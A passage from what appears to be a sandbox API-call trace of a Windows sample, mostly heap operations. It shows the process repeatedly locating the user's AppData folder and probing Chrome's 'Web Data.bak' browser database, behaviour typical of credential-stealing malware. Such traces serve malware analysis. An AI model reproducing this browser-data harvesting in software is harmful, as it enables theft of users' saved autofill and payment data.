Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.116] lstrlenA (lpString="") returned 0 [0180.116] GetProcessHeap () returned 0x5f0000 [0180.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f220 [0180.116] lstrcpyA (in: lpString1=0x61f220, lpString2="" | out: lpString1="") returned="" [0180.116] GetProcessHeap () returned 0x5f0000 [0180.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x6139e0 [0180.117] GetProcessHeap () returned 0x5f0000 [0180.117] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f230 [0180.117] ResetEvent (hEvent=0xc) returned 1 [0180.117] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.118] GetProcessHeap () returned 0x5f0000 [0180.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0180.118] GetProcessHeap () returned 0x5f0000 [0180.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6139e0 | out: hHeap=0x5f0000) returned 1 [0180.118] GetProcessHeap () returned 0x5f0000 [0180.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.118] GetProcessHeap () returned 0x5f0000 [0180.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.118] GetProcessHeap () returned 0x5f0000 [0180.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.129] lstrlenA (lpString="unable to open database file") returned 28 [0180.129] GetProcessHeap () returned 0x5f0000 [0180.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615ce0 [0180.129] lstrcpyA (in: lpString1=0x615ce0, lpString2="unable to open database file" | out: lpString1="unable to open database file") returned="unable to open database file" [0180.129] GetProcessHeap () returned 0x5f0000 [0180.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f220 [0180.129] lstrlenA (lpString="") returned 0 [0180.129] GetProcessHeap () returned 0x5f0000 [0180.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f230 [0180.129] lstrcpyA (in: lpString1=0x61f230, lpString2="" | out: lpString1="") returned="" [0180.129] GetProcessHeap () returned 0x5f0000 [0180.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615d20 [0180.129] GetProcessHeap () returned 0x5f0000 [0180.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.129] ResetEvent (hEvent=0xc) returned 1 [0180.129] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.136] GetProcessHeap () returned 0x5f0000 [0180.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.136] GetProcessHeap () returned 0x5f0000 [0180.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0180.136] GetProcessHeap () returned 0x5f0000 [0180.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0180.136] GetProcessHeap () returned 0x5f0000 [0180.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.136] GetProcessHeap () returned 0x5f0000 [0180.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.147] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625090) returned 0x80 [0180.147] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625090 | out: hHeap=0x5f0000) returned 1 [0180.147] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625000) returned 0x80 [0180.147] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625000 | out: hHeap=0x5f0000) returned 1 [0180.147] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.147] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.147] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.148] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.148] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615d60) returned 0x20 [0180.148] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.148] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615f60) returned 0x20 [0180.148] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.159] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.159] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.159] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624d50) returned 0x2a0 [0180.159] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624d50 | out: hHeap=0x5f0000) returned 1 [0180.159] GetProcessHeap () returned 0x5f0000 [0180.159] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a20 | out: hHeap=0x5f0000) returned 1 [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ea0 [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ca0 [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.160] lstrlenA (lpString="") returned 0 [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f220 [0180.160] lstrcpyA (in: lpString1=0x61f220, lpString2="" | out: lpString1="") returned="" [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ce0 [0180.160] GetProcessHeap () returned 0x5f0000 [0180.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f230 [0180.160] ResetEvent (hEvent=0xc) returned 1 [0180.160] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.165] GetProcessHeap () returned 0x5f0000 [0180.165] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0180.165] GetProcessHeap () returned 0x5f0000 [0180.165] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.165] GetProcessHeap () returned 0x5f0000 [0180.165] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.165] GetProcessHeap () returned 0x5f0000 [0180.165] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.165] GetProcessHeap () returned 0x5f0000 [0180.166] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.166] GetProcessHeap () returned 0x5f0000 [0180.166] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.166] GetProcessHeap () returned 0x5f0000 [0180.166] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f120 [0180.166] GetProcessHeap () returned 0x5f0000 [0180.166] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f220 [0180.166] GetProcessHeap () returned 0x5f0000 [0180.166] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f230 [0180.168] GetProcessHeap () returned 0x5f0000 [0180.169] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0e0 [0180.169] GetProcessHeap () returned 0x5f0000 [0180.169] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f110 [0180.171] GetProcessHeap () returned 0x5f0000 [0180.171] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.172] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.172] GetProcessHeap () returned 0x5f0000 [0180.172] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.172] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf540, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.172] GetProcessHeap () returned 0x5f0000 [0180.172] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3c0 [0180.172] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.172] GetProcessHeap () returned 0x5f0000 [0180.172] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.172] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.172] GetProcessHeap () returned 0x5f0000 [0180.173] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x89) returned 0x61c9d0 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x6207d0 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6207d0, Size=0x99) returned 0x611f60 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4d) returned 0x6201e0 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6201e0, Size=0xa1) returned 0x624900 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f110, Size=0x51) returned 0x6182f0 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c9d0 | out: hHeap=0x5f0000) returned 1 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.173] GetProcessHeap () returned 0x5f0000 [0180.173] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.174] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.174] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 0 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6182f0 | out: hHeap=0x5f0000) returned 1 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ea0 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615f60 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.177] lstrlenA (lpString="") returned 0 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f110 [0180.177] lstrcpyA (in: lpString1=0x61f110, lpString2="" | out: lpString1="") returned="" [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615d60 [0180.177] GetProcessHeap () returned 0x5f0000 [0180.177] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f290 [0180.177] ResetEvent (hEvent=0xc) returned 1 [0180.177] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f290 | out: hHeap=0x5f0000) returned 1 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.187] GetProcessHeap () returned 0x5f0000 [0180.187] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0e0 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.188] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.188] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf590, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f110 [0180.188] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.188] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x89) returned 0x61caf0 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620550 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0x99) returned 0x611f60 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4d) returned 0x6209b0 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6209b0, Size=0xa1) returned 0x624900 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0e0, Size=0x51) returned 0x618710 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.188] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.188] GetProcessHeap () returned 0x5f0000 [0180.189] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0180.189] GetProcessHeap () returned 0x5f0000 [0180.189] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.189] GetProcessHeap () returned 0x5f0000 [0180.189] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.189] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.189] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 0 [0180.189] GetProcessHeap () returned 0x5f0000 [0180.189] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0180.192] GetProcessHeap () returned 0x5f0000 [0180.192] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613320 [0180.192] GetProcessHeap () returned 0x5f0000 [0180.192] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.192] GetProcessHeap () returned 0x5f0000 [0180.192] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.192] lstrlenA (lpString="") returned 0 [0180.192] GetProcessHeap () returned 0x5f0000 [0180.192] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f110 [0180.192] lstrcpyA (in: lpString1=0x61f110, lpString2="" | out: lpString1="") returned="" [0180.192] GetProcessHeap () returned 0x5f0000 [0180.192] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613920 [0180.192] GetProcessHeap () returned 0x5f0000 [0180.192] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f440 [0180.192] ResetEvent (hEvent=0xc) returned 1 [0180.192] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.203] GetProcessHeap () returned 0x5f0000 [0180.203] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f440 | out: hHeap=0x5f0000) returned 1 [0180.203] GetProcessHeap () returned 0x5f0000 [0180.203] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613920 | out: hHeap=0x5f0000) returned 1 [0180.203] GetProcessHeap () returned 0x5f0000 [0180.203] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.203] GetProcessHeap () returned 0x5f0000 [0180.203] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.204] GetProcessHeap () returned 0x5f0000 [0180.204] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.204] GetProcessHeap () returned 0x5f0000 [0180.204] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.204] GetProcessHeap () returned 0x5f0000 [0180.204] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0e0 [0180.204] GetProcessHeap () returned 0x5f0000 [0180.204] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.205] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.205] GetProcessHeap () returned 0x5f0000 [0180.205] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.205] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf2c0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.205] GetProcessHeap () returned 0x5f0000 [0180.205] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f110 [0180.205] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.205] GetProcessHeap () returned 0x5f0000 [0180.205] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.205] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.205] GetProcessHeap () returned 0x5f0000 [0180.205] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.205] GetProcessHeap () returned 0x5f0000 [0180.205] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x89) returned 0x61caf0 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620730 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0x99) returned 0x611f60 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4d) returned 0x620820 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620820, Size=0xa1) returned 0x624900 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0e0, Size=0x51) returned 0x6183b0 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.206] GetProcessHeap () returned 0x5f0000 [0180.206] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.206] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.206] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 0 [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6183b0 | out: hHeap=0x5f0000) returned 1 [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.207] lstrlenA (lpString="") returned 0 [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f110 [0180.207] lstrcpyA (in: lpString1=0x61f110, lpString2="" | out: lpString1="") returned="" [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x6136b0 [0180.207] GetProcessHeap () returned 0x5f0000 [0180.207] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f300 [0180.207] ResetEvent (hEvent=0xc) returned 1 [0180.207] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6136b0 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.214] GetProcessHeap () returned 0x5f0000 [0180.214] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0180.215] GetProcessHeap () returned 0x5f0000 [0180.215] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0180.215] lstrlenA (lpString=0x0) returned 0 [0180.215] GetProcessHeap () returned 0x5f0000 [0180.215] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0d0 [0180.218] GetProcessHeap () returned 0x5f0000 [0180.218] RtlAllocateHeap 